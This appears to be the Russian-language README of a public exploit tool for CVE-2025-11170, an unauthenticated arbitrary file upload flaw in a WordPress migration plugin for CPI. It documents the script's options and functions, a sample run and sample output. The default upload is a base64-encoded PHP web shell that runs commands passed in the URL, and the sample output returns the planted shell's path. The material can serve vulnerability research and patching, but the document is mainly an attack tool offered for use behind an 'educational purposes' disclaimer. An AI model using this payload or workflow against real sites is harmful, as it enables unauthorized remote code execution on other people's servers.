
Плагин для миграции WP для CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload
WP移行専用プラグイン for CPI <= 1.0.2 - Неаутентифицированная произвольная загрузка файлов
Плагин WP移行専用プラグイン for CPI для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции Cpiwm_Import_Controller::import во всех версиях до 1.0.2 включительно.
Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер уязвимого сайта, что потенциально может привести к удаленному выполнению кода.
CVE-2025-11170.py| Аргумент | Описание |
|---|---|
-u, --url | Базовый URL цели (например, http://target.com/wordpress/). Скрипт автоматически добавляет wp-admin/admin-ajax.php. |
-f, --filename | Имя загружаемой оболочки или файла. По умолчанию: shell.php |
-d, --data | Содержимое файла в base64 (или в виде обычного текста). По умолчанию: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Значение поля index. По умолчанию: 0 |
-H, --headers | Дополнительные HTTP-заголовки (формат: X-Key:Value;K2:Value2) |
-t, --timeout | Таймаут HTTP-запроса (сек). По умолчанию: 10 |
--retries | Количество повторных попыток. По умолчанию: 3 |
--backoff | Коэффициент задержки между повторными попытками (сек). По умолчанию: 0.7 |
-v, --verbose | Увеличение подробности вывода для отладки (повторяемый параметр) |
Nxploited_parse_args
Парсит и проверяет входные аргументы. Гарантирует правильную структуру конечной точки, заголовков и кодировку данных.
Nxploited_logging
Настраивает расширенное логирование и уровень подробности для детального или минимального вывода во время выполнения.
Nxploited_retry_session
Инициализирует постоянную сессию с логикой повторных попыток и задержки для устойчивой связи.
Nxploited_build_payload
Формирует параметры POST-запроса для эксплуатации.
Nxploited_send
Выполняет фактический POST-запрос к уязвимой конечной точке и обрабатывает ответы/ошибки.
Nxploited_output_result
Обрабатывает и форматирует ответ, отображая путь к оболочке в случае успеха или отладочную информацию в противном случае.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Пример вывода:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
Этот скрипт предоставляется только для образовательных целей.
Использование данного эксплойта против целей без соответствующего разрешения может быть незаконным.
Автор НЕ несет ответственности за любое неправомерное использование, ущерб или юридические последствия.
GitHub: Nxploited
Telegram: KNxploited
Автор: Nxploited ( Khaled Alenazi )